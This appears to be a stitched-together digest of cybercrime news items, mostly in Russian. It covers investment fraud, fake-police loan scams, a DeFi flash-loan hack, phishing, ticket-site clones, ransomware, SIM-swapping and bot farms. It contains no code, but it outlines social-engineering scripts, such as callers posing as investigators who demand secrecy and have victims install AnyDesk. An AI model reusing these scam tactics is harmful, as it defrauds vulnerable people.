Как сообщило информагентство Bloomberg, на самом деле у инвесторов никогда не было возможности вернуть свои деньги, не говоря уже о получении прибыли. Обвиняемый был участником операции Wolf of Sofia, названной в честь ее руководителя Гала Б. (Gal B.).
С 2015 по 2019 год израильтянин был менеджером call-центров, работающих в Болгарии, Сербии, Боснии и Герцеговине и Грузии. Мошенники использовали торговые платформы, которые они назвали Safemarkets, OptionStarsGlobal, Cryptopoint, XTraderFX и пр. На площадке XTraderFX инвесторы со всего мира заплатили не менее $70 млн менее чем за год.
Злоумышленники вводили жертв в заблуждение с помощью фальшивых графиков, показывающих прибыль от торговли финансовыми активами, включая криптовалюту, бинарные опционы и контракты на разницу. Деньги пострадавших направлялись через сеть по отмыванию денежных средств.
Обвиняемый признался, что злоупотреблял наркотическими веществами с целью справиться с высоким давлением в бизнесе, а также из-за угрызений совести о том, что он обманывал инвесторов. Мужчина хочет попасть в реабилитационный центр и надеется, что его переведут в Израиль, где его бывшая жена живет с их детьми.
Под видом "спецоперации МВД" мошенники выманили у оршанца Br17,6 тыс. Об этом в своем Telegram-канале проинформировала пресс-секретарь МВД Ольга Чемоданова.
"Злоумышленники продолжают активно использовать преступную схему похищения денег, представляясь сотрудниками правоохранительных органов. Аферисты просят оказать содействие в спецоперации по поимке банковских работников, которые якобы оформляют кредиты, используя данные клиентов. На днях в ловушку попался 57-летний житель Орши. Позвонившая женщина сообщила о попытке оформить на его имя кредит и предложила совместно поймать преступника: для этого от жертвы требовалось открыть кредитную линию в банке и перевести средства на указанный ею счет. При этом собеседница подчеркнула, что сам разговор и все действия необходимо держать в тайне от членов семьи и знакомых, поскольку это "спецоперация МВД". Мужчина поверил и начал следовать инструкциям: оформил два кредита на общую сумму Br17,6 тыс. и перевел деньги. После этого абонент перестала выходить на связь", - рассказали в МВД.
Следователями возбуждено уголовное дело по факту хищения имущества путем модификации компьютерной информации, совершенного в крупном размере.
"С начала этого года на территории Беларуси фиксируется значительный рост (в 4,5 раза) хищений имущества в особо крупных и крупных размерах путем модификации компьютерной информации. Всего же совершено более 10 тыс. киберпреступлений, что на 53% больше по сравнению с аналогичным периодом прошлого года. В результате похищено свыше Br400 тыс.", - добавили правоохранители.
*****
Мошенники убедили жительницу Вилейки взять кредит на сумму более Br7,5 тыс. Об этом cообщили в УВД Миноблисполкома.
59-летняя жительница Вилейки стала жертвой мошенников, участвуя в якобы спецоперации следственных органов по поимке так называемых "крыс" внутри банка. Для этого женщине пришлось приехать в Молодечно и оформить потребительский кредит на крупную сумму.
"В субботу потерпевшей в Viber позвонил неизвестный мужчина, который представился следователем. По его словам, некий гражданин пытается оформить на ее имя кредит на сумму Br11 тыс. В этот момент женщиной овладел страх стать должником банка. При этом собеседник подчеркнул, что сам разговор она должна держать в секрете от всех членов семьи и знакомых, дескать, "следственная тайна". В противном случае за разглашение информации ей грозит штраф до Br12 тыс. Далее беседу с потенциальной жертвой продолжила девушка, которая разъяснила, что необходимо сделать, чтобы избежать финансовых потерь и оказать помощь следствию. Для разоблачения неблагонадежных работников банка, которые "сливают" данные о клиентах, женщине предлагалось обратиться в банк и самой оформить кредит, при этом внимательно следить за поведением специалиста. После этого лжесотрудник правоохранительных органов "переключил" женщину на известную всем "службу безопасности банка", где подтвердили необходимость данных действий. "Спецоперация" была запланирована на понедельник", - рассказали в УВД.
Жительница Вилейки поверила и начала следовать инструкциям: поехала в указанный банк в Молодечно, где под предлогом ремонта квартиры оформила кредит на сумму Br7660. Эти деньги были перечислены на карту, выданную ей в финансовом учреждении. Затем по совету мошенников женщина назвала свой идентификационный номер, установила на смартфон специальное приложение AnyDesk и сообщила пароль. Вскоре на ее телефон стали поступать СМС-уведомления о списании денежных средств. Испуганную клиентку заверили, что все под контролем, им удалось вычислить преступников, а списанная сумма обязательно будет возвращена на счет.
До следующего банка женщина не дошла - вовремя остановила дочь, открыв ей глаза на то, что та стала жертвой аферистов. В настоящее время правоохранители выясняют все обстоятельства произошедшего.
По данному факту Молодечненским районным отделом Следственного комитета возбуждено уголовное дело по ч.3 ст.212 (хищение имущества путем модификации компьютерной информации в крупном размере) Уголовного кодекса. Следователем допрошена потерпевшая, осмотрен мобильный телефон, зафиксирована имеющаяся в нем информация, направлены запросы в банковские учреждения.
Расследование уголовного дела продолжается.
Session app moves HQ to Switzerland after devs have been bullied by Aussie cops
Significant improvement when you compare privacy and anonimity laws in those 2
countries.
With all it's flows Switzerland is still among the best privacy respecting
countries

](https://www.404media.co/encrypted-chat-app-session-leaves-australia-after- visit-from-police-2/)
After federal police came to an employee’s house to ask questions, encrypted messaging company Session has decided to leave Australia and switch to a foundation model based in Switzerland.
www.404media.co
Хакеры атаковали протокол децентрализованных финансов Dough Finance, использовав мгновенный займ, в результате чего были потеряны цифровые активы на сумму $1,8 млн.
Компания Cyvers Alerts, специализирующаяся на безопасности в сфере Web3, сообщила в соцсети Х об обнаружении нескольких подозрительных транзакций с Dough Finance. Cyvers Alerts связалась с протоколом кредитования Aave, чтобы уточнить, были ли затронуты его пулы. Эксперты заверили, что пулы Aave находятся в безопасности. Основной удар атаки пришелся на протокол Dough Finance.
Злоумышленник получил финансирование через протокол Railgun с нулевым разглашением, воспользовавшись уязвимостью в смарт-контракте ConnectorDeleverageParaswap протокола Dough Finance. Поставщик услуг безопасности Olympix объяснил, что в смарт-контракте не удалось должным образом проверить данные вызовов при запросах срочного кредита, что позволило злоумышленнику манипулировать ими ради наживы. Хакер смог обменять украденные стейблкоины USDC на 608 ETH стоимостью около $1,8 млн.
__https://twitter.com/x/status/1811663035242553450
Эксперты по безопасности порекомендовали пользователям Dough Finance подумать о выводе криптоактивов на безопасные кошельки и временно прекратить взаимодействие с протоколом до тех пор, пока проблема не будет решена.
Хакеры использовали 72 поддельных домена для обмана сотрудников.
Компания ANY.RUN недавно провела тщательное расследование фишинговой кампании,
направленной на её сотрудников и решила поделиться важными выводами, чтобы
помочь другим организациям защититься от подобных угроз.
В ходе расследования специалисты ANY.RUN выявили 72 фишинговых домена, имитирующих реальные или вымышленные компании. Эти домены вели на правдоподобные сайты, которые обманывали пользователей и заставляли их делиться своими учётными данными. Атака была хорошо спланирована, хакеры использовали передовые методы, включая прямое взаимодействие с жертвами.
Атака состояла из четырёх основных этапов:
Восстановим же точную хронологию событий рассмотренной атаки. 27 мая 2024 года сотрудник компании ANY.RUN получил письмо от клиента, которое содержало ссылку на якобы голосовое сообщение. Письмо выглядело профессионально и внушало доверие: знакомый домен, контактные данные отправителя, правильная грамматика и непринуждённый тон.
При переходе по ссылке из письма сотрудник попал на страницу входа в аккаунт Microsoft. Сайт выглядел как настоящий: действующий сертификат безопасности, отсутствие предупреждений браузера и оформление, идентичное оригиналу.
Тем не менее, сотрудник компании допустил сразу ряд ошибок, которые и привели к компрометации. Во-первых, он не обратил достаточного внимания на URL в адресной строке. Несмотря на правдоподобный вид, адрес не имел связи с отправителем письма, службами Microsoft или инфраструктурой компании. А во- вторых, сотрудник ввёл реальные учётные данные на фишинговом сайте, что, собственно, уже вытекло из его первой ошибки.
После ввода учётных данных и двухфакторного кода сотрудник был перенаправлен на сайт Outlook с сообщением об ошибке. Заподозрив неполадки, сотрудник связался с клиентом, попросив отправить сообщение в текстовом формате. Однако сам факт взлома остался незамеченным.
Спустя примерно полмесяца, 18 июня 2024 года с аккаунта взломанного сотрудника была произведена фишинговая рассылка его коллегам и клиентам. Эти письма отличались низким качеством: множество орфографических и грамматических ошибок, несоответствие имён отправителя и подписей. Весьма странно, учитывая первоначальное качественное письмо, на которое купился сотрудник.
Анализ URL в этих письмах, ведущих, как правило, на Dropbox, показал, что адрес содержал закодированные параметры для отслеживания и идентификации жертвы. Веб-скрипт на странице собирал информацию о пользователе и передавал её на сервер злоумышленников.
Команда безопасности ANY.RUN успешно отразила вторую волну атаки и, исходя из выявленных проблем в своей системе, исследователи поделились рекомендациями и замечаниями, чтобы другие компании смогли избежать подобного рода атак.
Среди неочевидного: двухфакторная аутентификация хоть и важна, но она не защищает от прокси-атак. Крайне важно тщательно сверять URL-адрес перед вводом своих учётных данных на любом сайте, даже если он выглядит как легитимный сайт. Кроме того, к любым подозрительным письмам, особенно содержащим вложения или ссылки, рекомендуется относится с максимальной осторожностью.
Безопасность в цифровом мире требует постоянной бдительности и критического мышления. Даже опытные профессионалы могут стать жертвами изощрённых атак, если пренебрегут базовыми правилами кибергигиены. Ключ к защите — это не только технические меры, но и развитие культуры безопасности, где каждый сотрудник осознает свою роль в защите организации и умеет распознавать угрозы, независимо от их источника или кажущейся достоверности.
Как стало известно “Ъ”, Следственный комитет России (СКР) завершил расследование уголовного дела предполагаемых организаторов масштабной аферы с билетами ведущих российских театров. По версии следствия, бизнесмены Андрей Хартанюк и Алексей Куринов, создав несколько лет назад компанию по продаже билетов, в итоге превратили ее в центр крупнейшей в интернете сети, в которой использовались двойники сайтов наиболее популярных театров, в том числе Мариинки, Большого и Малого, РАМТа, а также консерватории имени Чайковского. На последнем этапе продажами занималось больше двух десятков фирм, работу сети поддерживали колл-центры в Москве и Владимире, к работе привлекались программисты, дизайнеры и специалисты по рекламе.
Расследованием крупнейшей в российском сегменте интернета аферы с театральными билетами СКР занимался почти два года. Основанием для начала расследования стало обращение в правоохранительные органы руководства Мариинского театра, обнаружившего, что билеты на его спектакли продаются через клоны официального сайта — mariinskii.com и mariinskiy-theatre.com.
Причем оба сайта внешне были почти неотличимы от официального: они копировали стилистику и символику Мариинки, активно продвигались через поисковые программы в интернете. Но при этом продаваемые через них билеты стоили в несколько раз дороже официальной цены.
В итоге по заявлению Мариинки была проведена доследственная проверка, результатом которой стало уголовное дело, возбужденное 14 февраля 2020 года центральным аппаратом СКР. Сначала оно расследовалось по довольно редкой в судебной практике ч. 4 ст. 180 УК РФ (незаконное использование средств индивидуализации товаров (работ, услуг)). И хотя в деле был всего один эпизод, следственную группу возглавил один из наиболее опытных сотрудников СКР, генерал-майор юстиции Сергей Новиков. Крупной удачей следствия стало задержание директора компании Simple Life Innovation Алексея Куринова. Компания, как считают в СКР, являлась своего рода центром незаконной билетной сети, в связи с чем ее глава и находился в федеральном розыске. После ареста господина Куринова, санкционированного судом 29 января 2021 года, в материалах дела стали появляться новые эпизоды и потерпевшие, а само обвинение дополнилось более жесткой статьей о мошенничестве в особо крупном размере (ч. 4 ст. 159 УК РФ).
Как выяснил впоследствии СКР, в декабре 2013 года бизнесмены Андрей Хартанюк и Алексей Куринов через фирму Simple Life Innovation начали продавать билеты на спектакли, спортивные матчи, фестивали и т. п. Господин Куринов был хорошим программистом и поэтому взял на себя техническую часть нового бизнеса, а его компаньон руководил всем проектом, занимаясь его развитием. Под эти задачи господин Хартанюк, по материалам расследования, зарегистрировал два домена — bilet2u.ru и sport2u.ru, и несколько лет работа компаньонов не выходила за рамки закона. Однако в феврале 2017 года, по версии следствия, Андрей Хартанюк, решив резко увеличить свой доход, дал указание компаньону создавать двойники официальных сайтов, после чего сам начал подбор сотрудников уже для исполнения своей новой задумки.
Сама преступная схема, по данным следствия, была не слишком оригинальна. Сначала дизайнеры создавали несколько сайтов, которые полностью копировали оформление и торговую марку сайтов популярных театров. В названиях клонов также использовались названия учреждений культуры. После регистрации и запуска сайтов специалисты преступной группы добивались того, что при запросах пользователей, связанных с покупкой билетов, именно «двойники» появлялись первыми в ответе поисковых систем.
Сами билеты фигуранты приобретали обычным образом, но перепродавали в несколько раз дороже.
По мере развития через сеть «двойников» стали распространять билеты не только на спектакли Мариинского театра, но также Большого и Малого, Театра наций, РАМТа и даже на концерты в Московской государственной консерватории имени Чайковского. Общий оборот сети, по данным правоохранителей, составил более миллиарда рублей. А обратили внимание на нелегалов после того, как непосредственно в театры стали обращаться покупатели, либо не получившие уже оплаченных билетов, либо возмущенные заоблачными ценами.
По данным следствия, реализуя криминальный план, господин Хартанюк взял на себя общее руководство новым бизнесом: назначал цены на билеты, распределял деньги, полученные от их продажи, и обеспечивал прикрытие фирмам, входящим в нелегальную сеть, от различного рода проверок. Алексей Куринов, по материалам дела, курировал работу дизайнеров, программистов, специалистов по продвижению и рекламе, которые были наняты организаторами. Спустя несколько месяцев в Москве и Владимире были открыты колл-центры для потенциальных покупателей. В массовом сбыте билетов по завышенным ценам были задействованы десятки компаний, в том числе «Мульти», «ДЭЗ Служба», «Шоу Маркет», «Без нас никак», «Евротикетс», «Вам билет», «Международная торговая компания» и другие. Активными участниками преступной группы в это время, по данным следствия, стали предприниматель Юлия Чарыкова, владелец фирм «Евротикетс», «Тикет маркет» и «Офис групп» Виталий Гашаков, гендиректор компании «Без нас никак» Яна Тагина, а также Ирина Хартанюк — гендиректор компании «Юрэксперт» и мать организатора сети. Последняя, по материалам расследования, занималась подбором и регистрацией юрлиц и ИП, которые затем включались в сеть «двойников» сына, а также курировала открытие банковских счетов и обналичивание средств, поступающих на них. Виталий Гашаков, говорится в материалах расследования, подбирал помещения для колл-центров, а также для размещения программистов, курьеров и др. Яна Тагина, считает следствие, руководила работой колл-центров, набирала туда операторов, распределяла заявки на билеты, следила за тем, чтобы с них удаляли их настоящую цену. Госпожа Чарыкова, по данным правоохранителей, была личной помощницей Андрея Хартанюка и координировала работу участников преступной группы, передавая им указания шефа.
Группа господина Хартанюка, отмечается в материалах дела, отличалась сплоченностью, действовала конспиративно.
Примечательно, что офис «билетной мафии» располагался по адресу Петровка, 19, совсем недалеко от здания столичной полиции.
Практически все руководители «билетной мафии» были в итоге задержаны, и им предъявили обвинения. Часть фигурантов вину признает частично, остальные претензии следствия отвергают. Однако Андрею Хартанюку и его матери удалось скрыться, оба заочно арестованы и объявлены в международный розыск. Потерпевшими по делу проходят на только театры, но и обманутые покупатели, которым не досталось билетов. Один только Мариинский театр намерен взыскать с организаторов аферы 50 млн руб., подав соответствующий иск.
Адвокат Алексей Кирсанов, представляющий интересы Мариинского театра, доволен тем, как качественно СКР провел расследование, подчеркнув, что главным его итогом можно считать тот факт, что сайты-клоны в театральном мире практически исчезли и продажи билетов с их помощью прекратились.
Project Zero, Google's 0day bug-hunting team, shared technical details and proof-of-concept (PoC) exploit code for a critical remote code execution (RCE) bug affecting a Windows graphics component.
The Project Zero researchers discovered the vulnerability, tracked as [CVE-2021-24093](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2021-24093), in a high-quality text rendering Windows API named Microsoft DirectWrite.
They reported the bug to the Microsoft Security Response Center in November.
The company released security updates to address it on all vulnerable
platforms on February 9, during this month's
Patch Tuesday.
The security flaw impacts multiple Windows 10 and Windows Server releases up to version 20H2, the latest released version.
After the 90-day disclosure deadline, Project Zero published a proof-of- concept exploit code that can be used to reproduce the bug in browsers running on fully-patched Windows 10 1909 systems.
"Attached is the proof-of-concept TrueType font together with an HTML file that embeds it and displays the AE character," the researchers said.
"It reproduces the crash shown above on a fully updated Windows 10 1909, in all major web browsers. The font itself has been subset to only include the faulty glyph and its dependencies."
The DirectWrite API is used as the default font rasterizer by major web browsers such as Chrome, Firefox, and Edge for rendering web font glyphs.
Since these web browsers use the DirectWrite API for font rendering, the security flaw can be leveraged by attackers to trigger a memory corruption state that may allow them to execute arbitrary code on the targets' systems remotely.
Attackers can exploit CVE-2021-24093 by tricking targets into visiting websites with maliciously crafted TrueType fonts that trigger a heap-based buffer overflow in the fsg_ExecuteGlyph API function.
Google patched a similar actively exploited zero-day in the popular FreeType text rendering library used to target Chrome users.
In November, Microsoft also fixed a Windows kernel zero-day bug actively exploited in targeted attacks and publicly disclosed by Project Zero one month earlier.
Авторы шифровальщика FonixCrypter объявили, что удалили исходный код своей малвари и планируют прекратить свою деятельность. Вместе с этим заявлением был опубликован инструмент для дешифровки файлов, инструкции к нему и мастер-ключ для вредоноса. То есть бывшие жертвы шифровальщика теперь могут бесплатно восстановить свои данные.

Шифровальщик FonixCrypter был активен как минимум с июня 2020 года. По
информации российского ИБ-специалиста Андрея Иванова, вредонос регулярно
обновлялся, и в прошлом году было выпущено как минимум семь различных
вариантов FonixCrypt.
Издание ZDNet сообщает, что аналитики компании Recorded Future уже
протестировали дешифровщик и подтвердили, что он (а также мастер-ключ)
работает, как и заявили злоумышленники.
«Ключ дешифрования, предоставленный авторами вымогателя Fonix, кажется легитимным, хотя с его помощью придется расшифровывать каждый файл отдельно. Но более важно то, что они обнародовали мастер-ключ ключ, который дает возможность создать лучший инструмент дешифрования».
Click to expand...
Эксперты компании Emsisoft уже разрабатывают более совершенный дешифровальщик, который, как ожидается, будет выпущен уже на этой неделе. По этой причине пользователям не рекомендуется использовать для спасения данных инструмент хакеров, который все же может содержать малварь и другие неприятные сюрпризы.
Хотя вымогатель работал и приносил деньги своим авторам, похоже, хакеры действительно решили свернуть свою деятельность. Так, группировка уже удалила свой Telegram-канал, где обычно рекламировала свою малварь другим преступникам. Впрочем, аналитики Recorded Future отмечают, что группа тут же объявила о планах запустить новый канал в ближайшем будущем. Неизвестно, будет ли этот новый канал сосредоточен вокруг какой-то новой малвари.
Согласно сообщению, опубликованному в Twitter, хакеры планируют завязать с вымогательским ПО и якобы будут использовать свои способности исключительно «в позитивном ключе».

Источник: xakep.ru/2021/02/01/fonixcrypter/
Платформа DeFi Indexed Finance стала жертвой сложного компьютерного взлома в октябре 2021 года. В результате взлома платформа потеряла миллионы в криптовалюте, возбудила гражданское дело и объявила предполагаемого хакера беглецом.
Подозреваемый — 19-летний Андеан Меджедович, который совершил кражу около 16 миллионов долларов в криптовалюте, когда ему было всего 18 лет.
Подростку из Ватерлоо, который был обнаружен под именем «Амеджедо», было предложено вознаграждение в размере 10% за безопасное возвращение жетонов, однако он отказался подыгрывать. Отметив в Твиттере: «Вы проиграли. Вы ничего не можете с этим поделать. … Такова криптовалюта».
В недавних разоблачениях теория «Кодекс есть закон» будет использоваться истцом в качестве защиты, аргумент, в котором запрограммированный кодекс является законом, будет проверен в деле против Медьедовича и будет иметь долгосрочное влияние на то, как закон применяется к цифровой мир.
«Некоторые люди в онлайн-сообществах считают, что «Кодекс — это закон» — это полный ответ всем, кто ищет средства правовой защиты от тех, кто совершает кибератаки или использует кодовые уязвимости. Другие считают это бессмысленным прикрытием для злоумышленников, стремящихся осуществить кражу и мошенничество с цифровыми активами. Мы считаем, что последнее верно, и если наше дело будет передано в суд, это будет первое зарегистрированное дело, которое проверит защиту «Кодекса». является Законом», — сказал партнер McMillan LLP Бенджамин Батгейт.
Click to expand...
Среди ордеров, применяемых по делу, есть ордер Антона Пиллера, также известный как ордер на обыск, который является первым в своем роде в деле о криптовалюте.
В электронных письмах журналисту Bloomberg Кристоферу Биму 18-летний парень отметил:
«Я не беспокоюсь о том, чтобы «получить работу». Отсиживаться в клетке — это не мое представление о хорошей жизни». добавляя: «Если у меня когда-нибудь появится идея для необходимой и полезной технологии, я, конечно же, создам ее. До сих пор у меня не было никакого божественного вдохновения на этом фронте».
Click to expand...
Однако в твитах, связанных с Медьедовичем, крипто-беглец из Ватерлоо сообщил, что ищет адвокатов, что, возможно, свидетельствует о его намерении провести свой день в суде.
«Я ищу самых элитных крипто-юристов», — говорится в твите, идентифицированном в Интернете как исходящий от его аккаунта. «Мне понадобится целая команда. Если indexed захочет намекнуть, что я сделал что- то не так, и прибегнет к оскорблениям, LOL».
Click to expand...
«Я могу заверить Андеана Медедовича в том, что судебный процесс не похож на прекрасное вино, которое с возрастом становится лучше», — отметил судья Фредерик Майерс в отношении того, что Медедович скрывается.
Суд по экономическим делам, рассматривая дело об отмывании денег, которое было совершено с использованием сети так называемых "денежных мулов", решил утвердить результаты сделки о признании вины и наказании, заключенной между прокурором и 12 подсудимыми.
Подсудимые были приговорены к тюремным срокам от трех до пяти лет в зависимости от роли каждого подсудимого в организованной группе. Для 11 членов группы сроки вынесены условно и с испытательным сроком.
Напомним в этой связи: "денежные мулы" — это люди, через которых преступные группы отмывают деньги. К примеру, получив на свой счет, "мул" снимает их наличными и, оставив себе вознаграждение, отдает заказчику.
Как схема работала
Как ранее уже сообщала прокуратура, всего по делу проходили 14 обвиняемых, один из которых оказался гражданином Германии, а все его подельники — граждане Латвии. Следует отметить, что всего в группу "мулов" входили более 90 человек. (Масштабное расследование по данному уголовному процессу было проведено совместно с Евроюстом).
Члены группы легализовывали в Латвии средства, преступно добытые за границей в ходе мошенничеств и других преступлений.
Похищенные за границей деньги зачислялись на банковские счета жителей Латвии в виде платежей ZIB, после чего средства снимались "наличкой", конвертировались в криптовалюту и зачислялись на криптовалютные кошельки, контролируемые организаторами организованной группы.
Прокуратура в этой связи отмечает: при расследовании таких дел нередко "мул", который может даже не знать, что деньги получены преступным путем. Однако это не освобождает от ответственности.
С обвиняемых уже взыскали 45 000 евро
Соглашение о признании вины и наказании было заключено с теми подсудимыми, которые воспользовались правом на сотрудничество, предусмотренным Уголовно- процессуальным законом. Они полностью признали свою вину и до заключения соглашения полностью или частично вернули в госбюджет средства, добытые преступным путем, а также полученные ими в качестве вознаграждения за отмывание денег.
Всего, до заключения соглашения с подследственных взыскали почти 45 000 евро, а также достигнута договоренность о добровольном возврате в госказну оставшейся части преступно нажитых средств.
В отношении еще одного обвиняемого дело направлено в Суд по экономическим делам для рассмотрения в общем порядке. В отношении другого обвиняемого продолжается досудебное следствие.
Если компания приобрела «Киберстрахование» на случай ущерба, причиненного
различными кибератаками,
может ли она получить компенсацию за ущерб, причиненный хакерскими атаками
Северной Кореи?
В данный момент в Корее отечественные страховые компании имеют 10 видов
«кибер-страхования» и «кибер-комплексного страхования».
Комплексное киберстрахование относится к страхованию, основанному на
страховании ответственности за утечку личной информации,
которое было обязательным в 2019 году, и состоит из другого обеспечения,
которое компенсирует различные убытки аффилированной компании.
Однако, если кибератака наносит большой ущерб большому количеству неуказанных
компаний,
а атаки является Северно Корейскими, компания может не получить страховые
деньги.
Страхование ответственности за утечку личной информации, как и страхование
гражданской ответственности не отвечает за ущерб относившийся к военным
провокациям.
Зависит от субъектов, если субъект относится к государству(правительству) или
нападение является актом войны то страховая компания не обязана выдавать
страховые деньги.
Так как крупномасштабные кибератаки Северной Кореи являются актом войны, это
приводит к выводу о применимости условий отказа от ответственности.
Фактически, за границей в настоящее время ведутся юридические споры о том,
следует ли добавлять к страховым ответственностям кибератаки со стороны таких
стран, как Северная Корея.
Даже если компания заплатит «выкуп» за восстановление компьютерных сетей и
информации, украденных хакерами северокорейских властей, вы не сможете
получить страховые деньги.
В этом случае получение средств путем нападения на конкретную компанию
является преступлением, а не актом войны, но страховая компания не
компенсирует,
поскольку Северная Корея является страной, на которую распространяются
санкции.
Сотрудник страховой компании, занимающейся комплексным киберстрахованием,
пояснил: «Если это выгодно стране, на которую наложены экономические санкции,
страховая компания не может выплатить страховые деньги».
Однако, поскольку правительство редко подтверждает или объявляет, что Северная Корея стоит за кибератакой, в страховых выплатах не отказывают, если Северная Корея подозревается в причастности.
Официальный представитель другой страховой компании, предсказал: «Если это будет только предположением о действиях Северной Кореи, страховые деньги будут выплачены».
Эксперты отмечают, что необходимо уточнить объем возмещения убытков, чтобы избежать споров, устранив эту двусмысленность, присущую киберстрахованию.
В частности, в Корее часты кибератаки, которые объявляются или предположительно являются делом рук северокорейских хакеров.
Сейчас молодому человеку сообщено о подозрении в несанкционированном вмешательстве в работу электронных коммуникационных сетей, в частности совершенном по предварительному сговору группой лиц. За содеянное ему грозит до пяти лет лишения свободы.
Разоблачили и задокументировали противоправную деятельность горожанина сотрудники управления противодействия киберпреступлениям в Одесской области Департамента киберполиции НПУ и следователи отдела полиции № 1 Одесского районного управления полиции № 1 под оперативным сопровождением сотрудников Управления СБУ в Одесской области.
В начале прошлого лета киберполицейские установили, что с ноября 2022 года по июль 2023 года 23-летний одессит незаконно вмешивался в работу украинского мобильного оператора. Приобретя специальное программное обеспечение и компьютерное оборудование с платами расширения, фигурант проводил «горячую» смену IMEI для SIM-карт мобильной связи для последующего их предоставления в аренду онлайн-сервисам виртуальных мобильных номеров.
Обеспечив функционирование так называемой ботофермы, правонарушитель связался в одном из популярных мессенджеров с пока неустановленным администратором двух российских платформ и обсудил с ним условия «сотрудничества». По договоренности с «клиентом» украинец подключал к своему ПК SMS-шлюзы типа GPRS/gsm с функцией замены IMEI и осуществлял «работу» с вражескими сервисами, на которых, кроме виртуальных номеров, должен был зарегистрировать и свой собственный электронный адрес.
За такую «аренду» ботофермы в пользование российским онлайн-сервисам одессит получал вознаграждение в рублях на электронный кошелек. Менее чем за год сумма его незаконного заработка при переводе в гривны достигла около 60 тысяч. Вместе с этим заказчик услуги получал возможность «продавать» другим гражданам РФ «анонимность» при регистрации учетных записей в различных социальных сетях, мессенджерах и интернет-платформах. Последние же могли использовать их в своих целях, например, как для распространения пропаганды, так и для создания фейковых аккаунтов, фишинговых рассылок и тому подобное.
В ходе следствия установлено, что за более чем восемь месяцев своей противоправной деятельности злоумышленник использовал почти три сотни номеров одного и того же мобильного оператора Украины. Чтобы избежать блокировки «онлайн-бизнеса» со стороны коммуникационной сети, он время от времени проводил систематическую замену сим-карт в оборудовании.
Во время санкционированного обыска по месту жительства злоумышленника следователи изъяли компьютерную технику с программным обеспечением, специальное оборудование, жесткие диски, SIM-банки/GSM шлюзы и мобильный телефон с привязанным электронным кошельком, на который поступала оплата.
"В ходе досудебного расследования вещественные доказательства были направлены на компьютерно-техническую экспертизу, результаты которой подтвердили незаконность действий одессита. Сейчас мы под процессуальным руководством Малиновской окружной прокуратуры города Одессы сообщили фигуранту о подозрении по ч. 2 ст. 361 Уголовного кодекса Украины. Речь идет о несанкционированном вмешательстве в работу электронных коммуникационных сетей, в частности совершенном по предварительному сговору группой лиц. Это преступление наказывается штрафом от 51000 до 119000 гривен или ограничением свободы на срок от двух до пяти лет, или лишением свободы на тот же срок. Следственные действия продолжаются ", - сообщил следователь территориального подразделения полиции Владислав Степенко.
od.npu.gov.ua/news/politseiski-likviduvaly-diialnist-botofermy-z- iakoi-23-richnyi-odesyt-otrymuvav-prybutok-v-rubliakh
Colombian energy company Empresas Públicas de Medellín (EPM) suffered a BlackCat/ALPHV ransomware attack on Monday, disrupting the company's operations and taking down online services.
EPM is one of Colombia’s largest public energy, water, and gas providers, providing services to 123 municipalities. The company generated over $25 billion in revenue in 2022 and is owned by the Colombian Municipality of Medellin
On Tuesday, the company told approximately 4,000 employees to work from home, with IT infrastructure down and the company's websites no longer available.
EPM disclosed to local media that they were responding to a cybersecurity incident and provided alternative methods for customers to pay for services.
The Prosecutor's Office later confirmed to EL COLOMBIANO that ransomware was behind the attack on EPM that caused devices to be encrypted and data to be stolen.
However, the ransomware operation behind the attack was not disclosed.
Source:https://www.bleepingcomputer[.]com/...er-epm-hit-by-blackcat- ransomware-attack/amp/
sorry if the source link is not well cited or is it? thank you
Гражданин Украины Денис Ермак был участником хакерской группы FIN7, которую США считают ответственной за многочисленные взломы американских компаний.
В США гражданин Украины получил пять лет тюрьмы за преступную деятельность в составе хакерской группы FIN7, сообщает американский Минюст.
В пресс-релизе ведомства говорится, что 32-летний Денис Ермак был хакером высокого уровня и в составе FIN7 с 2016 по 2018 год искал уязвимости, которые можно использовать для внедрения в компьютерные сети.
Киберпреступной группе удалось взломать сети по всей территории США и получить доступ к личным данным порядка 20 млн человек. Общий ущерб для американской экономики от деятельности этого преступного сообщества составил около $1 млрд.
Украинец был экстрадирован из Таиланда в феврале 2020 года после того, как суд подтвердил законность американского запроса. В ноябре 2021 года Ермак признал свою вину по двум пунктам обвинений: сговор с целью совершения мошенничества с использованием электронных средств связи и сговор с целью взлома компьютера.
Канадский производитель VPN-сервиса Windscribe не использовал шифрование для защиты своих VPN-серверов, недавно изъятых Службой безопасности Украины (СБУ). Именно благодаря отсутствию шифрования СБУ удалось подделать серверы Windscribe, перехватывать и расшифровывать проходящий через них трафик.
Ранее в этом месяце компания Windscribe сообщила , что два ее сервера, расположенные на территории Украины, были изъяты в рамках расследования инцидента, имевшего место год назад. Серверы, на которых было запущено ПО OpenVPN, были сконфигурированы таким образом, чтобы использовать устаревшие настройки, признанные уязвимыми еще в 2018 году (уязвимость позволяла третьим сторонам расшифровывать данные).
Новость за
27 Июля 2021
В Торонто полиция задержала 10 человек и выдвинула 108 обвинений в рамках масштабного расследования мошенничества с подменой SIM-карт под названием «Project Disrupt». Расследование, начатое еще в июне 2023 года, было проведено совместными усилиями подразделения финансовых преступлений и координированного киберцентра (C3).
Мошенники использовали уязвимости двухфакторной аутентификации, чтобы получить доступ к мобильным номерам жертв. Подменяя SIM-карты, они могли перехватывать сообщения и звонки, связанные с восстановлением паролей, и таким образом получали доступ к учётным записям жертв, включая онлайн-банкинг и социальные сети.
За период расследования полиция получила многочисленные сообщения от телекоммуникационных компаний, выявивших случаи несанкционированного доступа к счетам своих клиентов. Преступники использовали поддельные документы для подтверждения личности в магазинах мобильных операторов и банках, а также применяли фишинговые техники, чтобы завладеть данными клиентов через поддельные веб-сайты и ссылки.
Во время проведения обысков полицейские изъяли более 400 поддельных удостоверений личности и множество доказательств, подтверждающих деятельность мошенников. Общий ущерб, нанесенный жертвам, телекоммуникационным компаниям и финансовым учреждениям, превысил 1 миллион долларов. Более 1500 сотовых аккаунтов по всей Канаде оказались скомпрометированными.
Среди арестованных - молодые люди в возрасте от 18 до 24 лет из разных городов Канады, включая Торонто, Брамптон, Миссиссогу и Виннипег. Обвинения, предъявленные задержанным, включают мошенничество в особо крупном размере, неправомерное использование компьютерных систем, перехват частных сообщений и владение имуществом, полученным преступным путем. Некоторым из обвиняемых грозят дополнительные статьи за подделку документов и выдачу себя за других лиц.
Полиция также разыскивает двух подозреваемых:
Надия Кампителли, 47 лет, Торонто - обвиняется в мошенничестве и нарушении условий испытательного срока.
Эрвин Умутиджима, 26 лет, Торонто - обвиняется в повреждении компьютерных данных, попытке мошенничества и использовании поддельных документов.
Фотографии разыскиваемых подозреваемых, а также изображения изъятых поддельных удостоверений личности были опубликованы полицией.
